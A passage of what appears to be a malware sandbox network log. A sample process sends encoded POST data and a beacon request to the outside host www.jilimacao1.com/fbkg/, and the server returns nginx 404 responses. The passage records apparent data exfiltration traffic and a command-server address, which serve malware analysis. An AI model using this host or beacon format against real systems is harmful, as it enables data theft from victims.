65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                2134.126.191.8480192.168.11.2050148C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718319893 CET552OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 55 46 41 57 54 31 6f 73 55 4a 78 47 5a 55 47 6c 58 43 59 4f 43 59 45 79 33 36 6e 4a 5a 36 58 43 48 53 7a 58 76 44 36 42 44 6e 55 65 58 2f 67 5a 62 2b 7a 4d 71 4e 65 2b 59 74 34 76 47 38 77 2b 74 66 38 6f 43 54 35 48 47 79 76 35 63 4e 33 33 63 7a 64 34 41 37 4f 57 7a 62 77 49 4a 51 47 51 4e 73 70 36 70 46 61 75 63 57 6b 49 4e 43 74 58 77 31 64 38 78 32 2f 59 2f 72 67 76 55 41 6e 6f 2f 32 44 35 61 79 57 6b 51 65 70 67 6d 6d 55 67 4a 4b 78 65 50 6d 4d 6e 49 31 6e 58 65 30 44 62 69 56 32 71 55 4b 77 71 6a 69 66 64 2b 70 70 4b 51 76 67 79 5a 59 6c 50 44 4a 4e 36 72 50 6d 76 45 78 6b 48 59 39 66 31 64 37 62 6a 31 57 59 79 78 74 66 73 69 76 69 54 53 56 66 46 79 30 71 74 4f 49 5a 41 4e 69 38 35 37 37 72 4b 61 73 2b 38 33 37 56 54 32 78 32 4f 30 49 6c 69 6f 34 38 7a 77 4c 47 42 37 52 51 62 4e 64 65 61 65 45 50 47 66 65 61 4a 70 4d 66 4c 59 79 30 45 51 71 37 6d 38 55 41 6c 57 52 57 41 44 75 34 44 44 63 30 6b 4a 77 50 37 69 33 41 36 71 43 5a 55 77 62 4b 73 69 79 6a 58 32 44 52 71 63 35 6e 52 4a 35 52 36 79 32 47 61 71 41 66 2f 6e 58 74 37 33 51 41 30 64 2f 68 38 5a 64 69 69 4c 50 37 6d 54 4f 6c 36 61 44 43 35 6a 6f 67 2f 6f 32 4e 39 46 4a 68 56 30 51 59 57 2f 75 54 78 77 75 35 53 59 51 4b 63 48 6e 66 4d 63 67 70 62 34 61 35 69 6f 73 72 36 63 68 76 33 37 35 58 67 37 36 6a 32 77 4c 5a 77 33 63 37 4f 45 33 6a 73 41 56 36 71 38 78 31 59 56 4e 4a 69 6f 6d 67 32 47 57 5a 39 4d 48 69 74 32 35 74 6a 71 71 4b 41 74 31 6a 43 41 49 34 30 59 53 2b 48 33 4b 37 4c 7a 38 2b 6b 31 78 51 78 54 4d 6a 6c 68 68 66 72 78 37 49 78 53 34 6d 65 52 5a 48 58 7a 50 7a 52 48 38 49 65 48 48 56 63 68 30 38 6e 44 2b 39 61 6a 65 46 58 75 56 4d 64 58 7a 4b 6b 74 49 33 2b 2b 57 77 73 49 63 6b 4a 6f 5a 34 66 78 67 31 58 52 4c 51 4b 4e 56 6c 4d 79 74 49 52 45 53 59 56 5a 30 76 78 75 73 34 4d 38 38 34 66 53 73 4c 76 72 77 73 62 30 5a 62 38 30 56 39 77 4f 63 4d 34 44 62 37 6b 5a 2f 48 48 69 58 6f 75 75 70 63 41 73 58 4c 41 49 6d 39 67 77 66 6b 73 76 31 75 4b 69 56 59 32 45 45 48 66 77 6b 59 37 52 4f 72 5a 77 4e 4d 52 58 45 36 4f 47 68 51 35 7a 67 42 44 48 79 4f 51 77 77 4d 52 74 6e 4b 70 4e 41 62 33 66 75 32 49 31 37 42 35 55 42 72 4a 78 6b 64 51 75 48 2b 4b 72 6f 6d 72 71 69 34 70 37 4a 42 48 48 6c 37 6b 53 49 61 48 47 45 64 75 63 74 50 70 6f 38 76 33 7a 42 31 6a 56 6c 4b 70 70 75 59 67 53 6c 63 68 6d 76 4c 61 2f 64 53 6d 48 36 44 30 57 53 33 30 32 71 79 74 35 33 48 6f 66 46 30 58 2b 38 77 63 56 33 6b 41 78 52 62 70 6e 5a 4b 4c 6b 36 47 66 54 55 66 64 6d 4c 46 71 57 4e 48 66 6f 73 4c 76 48 72 77 32 46 77 78 4b 39 46 54 4d 6e 57 53 58 71 55 56 79 57 72 43 43 73 4f 6c 74 75 75 62 6d 6f 49 39 6c 79 41 4e 59 35 4b 4f 32 31 68 72 51 32 38 76 49 62 48 68 78 62 76 6d 66 72 43 4e 43 68 47 6c 63 6b 44 57 59 47 65 70 70 41 6a 76 7a 34 42 38 61 56 34 43 4c 47 67 61 70 2b 55 35 71 2f 66 39 6a 31 54 31 71 7a 74 44 67 67 4b 77 44 71 38 32 75 75 6e 6e 4f 70 54 53 6f 75 32 59 45 64 65 69 4a 30 39 69 44 37 51 6d 62 59 64 51 6a 50 38 54 68 36 36 35 78 62 45 6a 76 7a 33 4b 47 44 49 51 39 66 74 4a 39 32 4d 75 7a 6a 67 72 69 59 34 68 46 38 46 55 6c 78 75 76 53 34 57 49 73 4a 2b 6f 57 55 59 53 45 43 39 39 46 62 70 38 6c 32 66 53 49 52 71 56 63 59 6a 6a 4f 38 4a 45 66 50 45 6e 54 4d 4b 50 67 4f 44 69 55 41 6a 78 36 72 61 51 73 52 72 74 74 53 73 36 68 56 79 44 55 6f 69 61 43 59 4c 7a 56 54 67 6a 43 46 6d 4c 66 31 65 49 71 74 59 38 4c 62 30 37 57 4a 35 6b 33 56 64 31 44 76 67 6f 47 36 61 34 34 45 59 43 66 62 64 4c 52 77 30 4e 47 76 67 47 68 2f 4f 5a 67 6c 73 6a 58 6d 2b 62 48 35 69 4f 4b 53 58 6d 54 35 4a 49 6b 33 4a 51 47 45 56 53 70 65 47 54 58 4e 68 65 57 57 71 75 49 51 64 36 74 64 37 39 4b 45 55 32 71 78 4b 57 31 36 62 4b 5a 71 6b 62 72 77 70 36 72 73 39 64 51 32 41 51 57 79 63 6d 35 39 4f 77 68 4c 72 63 33 72 55 4b 48 76 43 63 62 6c 78 33 54 31 48 65 34 39 73 4a 71 4d 57 37 2f 43 6c 53 6b 7a 4d 69 6a 75 71 74 7a 55 77 6e 52 39 51 4f 69 52 51 68 79 72 5a 4a 4f 37 63 66 59 66 71 53 77 42 30 45 33 78 31 75 58 75 76 4e 34 44 32 6c 65 69 78 61 7a 77
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718415022 CET558OUTData Raw: 46 51 75 57 66 78 42 56 50 37 4b 50 38 77 72 4d 53 47 66 37 76 6e 37 5a 79 73 6b 6d 35 71 4d 6f 4f 43 4b 42 74 44 55 55 5a 4a 6b 6e 78 55 4f 77 61 76 52 64 55 42 75 58 58 61 58 4c 4b 59 76 56 6b 66 61 5a 56 4c 33 4d 6b 7a 77 4a 6a 78 6d 36 57 4e
                                                                                                                                                                                                Data Ascii: FQuWfxBVP7KP8wrMSGf7vn7Zyskm5qMoOCKBtDUUZJknxUOwavRdUBuXXaXLKYvVkfaZVL3MkzwJjxm6WNjwayoQwA2et+tdCoMchDl92PFELrASkcHCNCofgPePuWpNyQAHRcM4MwijdH3rWjB7dMcq8aI6Gmitrl8IpmNluatPYXG1fapm6bvNmbqODiLe+oomA0EP4mT9iUkopVqVpBXANl8bdJTwRKPMaFihmh0unVUl6ks
                                                                                                                                                                                                Nov 17, 2023 19:27:55.060394049 CET563OUTData Raw: 38 64 71 6c 43 34 59 72 53 71 5a 33 59 54 32 49 58 78 6d 45 65 5a 7a 4a 79 50 6b 4d 65 4b 4a 4c 4d 6f 7a 2f 30 48 36 70 75 47 63 36 32 49 6e 39 54 7a 67 78 76 6d 46 53 4b 54 64 70 47 69 68 67 66 4b 43 4e 76 77 38 50 4d 2f 35 48 65 42 56 79 2f 59
                                                                                                                                                                                                Data Ascii: 8dqlC4YrSqZ3YT2IXxmEeZzJyPkMeKJLMoz/0H6puGc62In9TzgxvmFSKTdpGihgfKCNvw8PM/5HeBVy/YFp9MhAILwe2lXL1zX6FD2tcvYTQjyOfInkJ8Raqt+VWP0/6zI2kg1yF6hrFQUg6SKhzayllduuuSgVKfmYPurMrUe6IIQ4e7g00nxPpAblPve7pxqgeRiqs8vruczlYolj7J5BO/NR5K/+qwC+cbQbw9kcq6ygor1
                                                                                                                                                                                                Nov 17, 2023 19:27:55.905519962 CET564OUTData Raw: 53 38 73 38 77 58 64 4b 6e 45 53 2f 33 56 48 6f 67 6a 33 6a 34 50 65 57 46 64 75 58 62 37 4f 4b 54 36 50 31 78 58 77 71 59 78 77 7a 2b 68 65 6e 64 58 56 30 36 43 59 55 59 45 45 4b 62 43 34 4d 64 38 7a 41 32 4e 38 46 4a 59 2f 6c 30 63 4e 33 72 57
                                                                                                                                                                                                Data Ascii: S8s8wXdKnES/3VHogj3j4PeWFduXb7OKT6P1xXwqYxwz+hendXV06CYUYEEKbC4Md8zA2N8FJY/l0cN3rWlQ6eLvuT0QqsOZr+PGCyujxnvkzjt3vCNWbd7G+rAqib0DlHju25jw8zc/9pPmUcdfLZMK0Gdjuert9HyRA/dMTcGzY8vAGLrNI1NJtlfHjwf82czZw3tJCv/083FITxhefj8npX6Egwv4qjCNhoUdEbV8cTwQsY9
                                                                                                                                                                                                Nov 17, 2023 19:27:57.116523027 CET586INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:54 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                22192.168.11.205014934.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:57.591856956 CET587OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:27:58.010937929 CET589INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:57 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                2234.126.191.8480192.168.11.2050149C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:57.591856956 CET587OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:27:58.010937929 CET589INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:57 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 